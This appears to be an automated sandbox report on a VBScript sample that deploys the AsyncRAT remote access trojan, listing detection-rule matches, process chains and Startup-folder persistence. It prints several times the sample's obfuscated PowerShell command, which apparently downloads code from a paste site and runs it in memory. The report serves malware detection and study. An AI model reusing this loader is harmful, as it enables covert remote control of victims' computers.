                Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5368, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript called in batch mode (surpress errors)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbsJump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E56CD84_2_00007FF848E56CD8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F2144D4_2_00007FF848F2144D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_014A10087_2_014A1008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_014AD75C7_2_014AD75C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595B7A07_2_0595B7A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595C0707_2_0595C070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595B4587_2_0595B458
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0595E7617_2_0595E761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_059573D07_2_059573D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F24487_2_067F2448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F15787_2_067F1578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F59487_2_067F5948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_067F67907_2_067F6790
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848E86CD814_2_00007FF848E86CD8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F5177A14_2_00007FF848F5177A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_029A100816_2_029A1008
                Source: sostener.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2028
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2039
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2028Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2039Jump to behavior
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5368, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, Hf0jRXweJYx23320j.csCryptographic APIs: 'TransformFinalBlock'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, Hf0jRXweJYx23320j.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, XYfrwW5V593UMwIH2.csBase64 encoded string: 'NSiFidP4xfNrihzlXDB35Khxj04PhkVTUKw4OhkxgWgicGZYFhCNgnZSMCYOqxA2Lmt2cBAcgz5NeqEkSvZK', 'jkGR6rJJQ9faSjVbXYtAzRb4ajtLkXKBS1zRcG1mw9LaA2xUqOTikhTtYXc86FK8iinzYXRniNUm6Cd6fXRD'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csBase64 encoded string: 'KXhQCRAD24tV6QfHKI3jylnihUeIKgmm8JxCSu994N88j3QAb4CcU4XupLiDB0DJkq0dWWplLWwpHzJSDmac'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, XYfrwW5V593UMwIH2.csBase64 encoded string: 'NSiFidP4xfNrihzlXDB35Khxj04PhkVTUKw4OhkxgWgicGZYFhCNgnZSMCYOqxA2Lmt2cBAcgz5NeqEkSvZK', 'jkGR6rJJQ9faSjVbXYtAzRb4ajtLkXKBS1zRcG1mw9LaA2xUqOTikhTtYXc86FK8iinzYXRniNUm6Cd6fXRD'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csBase64 encoded string: 'KXhQCRAD24tV6QfHKI3jylnihUeIKgmm8JxCSu994N88j3QAb4CcU4XupLiDB0DJkq0dWWplLWwpHzJSDmac'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@25/21@6/6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
